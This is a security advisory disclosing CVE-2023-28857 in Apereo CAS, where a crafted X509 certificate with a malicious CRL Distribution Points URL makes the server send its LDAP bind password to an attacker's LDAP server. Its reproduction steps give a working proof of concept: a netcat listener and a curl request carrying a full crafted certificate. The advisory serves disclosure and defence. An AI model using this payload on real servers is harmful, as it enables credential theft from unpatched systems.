Coordinated Disclosure Timeline
- 2023-02-20: Report sent to cas-appsec-private@apereo.org
- 2023-02-20: Acknowledged and fixed, version 6.6.6 is available to download via cas-overlay
- 2023-02-20: Maintainer issues a public post describing the problem
Summary
When CAS is configured to use X509 certificate authentication with LDAP directory, an unauthenticated user can leak the credentials for LDAP authentication. This is possible by sending a specially crafted X509 client certificate that contains a “CRL Distribution Points” extension with URLs pointing to a malicious resource.
Product
Apereo CAS
Tested Version
Details
LDAP password leak in X509CredentialsAuthenticationHandler.java
(GHSL-2023-009
,CVE-2023-28857
)
Apereo CAS can be configured to use authentication based on client X509 certificates. These certificates can be provided via TLS handshake or a special HTTP header, such as “ssl_client_cert”. When checking the validity of the provided client certificate, X509CredentialsAuthenticationHandler performs check that this certificate is not revoked. To do so, it fetches URLs provided in the “CRL Distribution Points” extension of the certificate, which are taken from the certificate itself and therefore can be controlled by a malicious user.
If the CAS server is configured to use an LDAP server for x509 authentication with a password, for example by setting a “cas.authn.x509.ldap.ldap-url” and “cas.authn.x509.ldap.bind-credential” properties, X509CredentialsAuthenticationHandler
fetches revocation URLs from the certificate, which can be LDAP urls. When making requests to this LDAP urls, Apereo CAS uses the same password as for initially configured LDAP server, which can lead to a password leak.
Note: X509CredentialsAuthenticationHandler only checks date validity, revocation, but not validity of signature of the provided certificate. So, in order to exploit the issue, even an untrusted self-signed certificate can be used. If Apereo CAS is placed behind a reverse proxy, which checks the validity of TLS certificate, this vulnerability can still be exploited, but an attacker needs to somehow craft a signed certificate with a CRLDP extension.
Steps to reproduce
-
Download CAS Overlay v6.6.4 from cas-initializer (https://casinit.herokuapp.com/ui), including
cas-server-support-x509
andcas-server-support-rest-x509
dependencies. Unzip it to a local folder. -
Build it using the following commands for example:
./gradlew clean build
,mkdir /etc/cas
,./gradlew createKeystore
and./gradlew copyCasConfiguration
- Start Apereo CAS with the following parameters*:
cas.authn.x509.crl-fetcher=ldap \ cas.authn.x509.extract-cert=true \ cas.authn.x509.ldap.base-dn=o\=tomcat \ cas.authn.x509.ldap.bind-credential=s3cr3taaaaa \ cas.authn.x509.ldap.bind-dn=admin \ cas.authn.x509.ldap.ldap-url=ldap://example.com:1389/ \ cas.authn.x509.ldap.search-filter=cn\={user} \ cas.authn.x509.revocation-checker=crl \ cas.rest.x509.header-auth=true \ java -jar ./build/libs/cas.war
It will start a CAS instance that uses LDAP server at located
ldap://example.com:1389/
withadmin
ands3cr3taaaaa
credentials. It will also enable revocation checking using LDAP. - Open a netcat listener on the localhost or any accessible network device:
nc -lv 1389
- Next send a request with a malicious certificate that contains a URL for the attacker-controlled LDAP server ldap://localhost:1389/ in the CRLDP extension:
curl -i -s -k -X POST https://localhost:8443/cas/v1/tickets/ \ -H $'ssl_client_cert: -----BEGIN CERTIFICATE----- MIIDQzCCAiugAwIBAgICBTkwDQYJKoZIhvcNAQELBQAwFzEVMBMGA1UEAwwMVHJ1c3QgQW5jaG9yMB4XDTIzMDExNjE3MTAzMFoXDTIzMDQyNjE3MTAzMFowEjEQMA4GA1UEAxMHQ0EgQ2VydDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM0espevAmhaLlqMdm0dnQ3oZmvGz9b8CFOqGOn6Y6zOtqjE26VeW+sqvxRktOpFzI+0UubaPLHJQFv0j/3adg4/7TUEHDwFMlj863CMMUlLFmBhWWMTIaKadC1Xbfd9wVzMw5mK72MWRvgkt0budelQPMbBWNzezYcGWQejfGn/yTl3NPPZVUbokKwWOUKpAO7BNNyLABkLl9S6iu86Bnd2hMCWWaUij344/hr6LCNAZj8u+VNk6AHsdQ3+yX2cBxrKUaf9atWZfSGk+1FXTnhygx3u0MG19T/QUoSGf3tbKVXrj9GCn8Cxyqc7XNl/9AVEVt4LK6nuk9QFX0zW/vsCAwEAAaOBnTCBmjAdBgNVHQ4EFgQUCNxRyUrdI+K9zYVIrqkaS4SznswwPwYDVR0jBDgwNoAUAfdL5C2O2UfK9x+wcKpn49gAm9ShG6QZMBcxFTATBgNVBAMMDFRydXN0IEFuY2hvcoIBATAPBgNVHRMECDAGAQH/AgEAMCcGA1UdHwQgMB4wHKAaoBiGFmxkYXA6Ly9sb2NhbGhvc3Q6MTM4OS8wDQYJKoZIhvcNAQELBQADggEBADoTyg36gr1GglAXOwh6UMcm1oe5TkEHkW+6sk2Zxdx2P2c2X74U8PUQdCcjxauWxJPCY5VghETIIb+vLIoNGEArHCGFEg/vCW+0fYZbCjAVvo7jPqbVFplb5BLUrXh+7hBPsLu6CrJZztcqDnqGEQUXTeV0DMrCIinmS/gu2e0Vad8Zfp0gMpbe7GralzTZZczab8DZ3C31cteBjEjxXTlI8tU4DMNnmNRT32/bDSmRoNrV10XpglMaDbYOFk9FZh5y+820Nmb2jsljUbioJ2OHwKO4TYawW01d2U0VpAO7IIAap+9SEKolu519MocrLFMp2uHrx0v4sOLHKtXiqGY=-----END CERTIFICATE-----'
- When processing this request, the vulnerable CAS server initiates a connection to user-provided URL
https://localhost:1389/
with the username and password initially configured forldap://example.com:1389/
.
* This is just an example configuration for easy testing, in real production systems it might be different but still vulnerable.
Impact
An unauthenticated user can leak the password used to LDAP connection configured on server.
CVE
- CVE-2023-28857
Credit
This issue was discovered and reported by GHSL team member @artsploit (Michael Stepankin).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2023-009
in any communication regarding this issue.